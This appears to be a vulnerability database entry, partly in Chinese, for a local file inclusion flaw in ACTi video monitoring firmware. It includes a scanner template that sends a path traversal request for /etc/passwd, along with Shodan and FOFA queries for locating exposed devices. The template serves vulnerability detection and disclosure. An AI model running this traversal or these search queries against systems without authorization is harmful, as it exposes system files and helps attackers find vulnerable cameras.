acti-video-lfi: ACTi-Video Monitoring - Local File Inclusion

日期: 2025-08-01 | 影响软件: acti video monitoring | POC: 已公开

漏洞描述

ACTI video surveillance has loopholes in reading any files

PoC代码[已公开]

id: acti-video-lfi

info:
  name: ACTi-Video Monitoring - Local File Inclusion
  author: DhiyaneshDk
  severity: high
  description: |
    ACTI video surveillance has loopholes in reading any files
  reference:
    - https://www.cnblogs.com/hmesed/p/16292252.html
  classification:
    cpe: cpe:2.3:o:acti:camera_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: acti
    product: camera_firmware
    shodan-query: title:"Web Configurator"
    fofa-query: app="ACTi-视频监控"
  tags: acti,lfi,iot,video,monitoring,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/images/../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "application/octet-stream"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207cbe35b5818f89ec37b3548dfcea24237b3efa5a9e549ac4d2f003996861c8a7022100a216008607f3e5205ec96736c8196d4cca7bc87e85eaf7f146f08ddd60050093:922c64590222798bb761d5b6d8e72950

相关漏洞推荐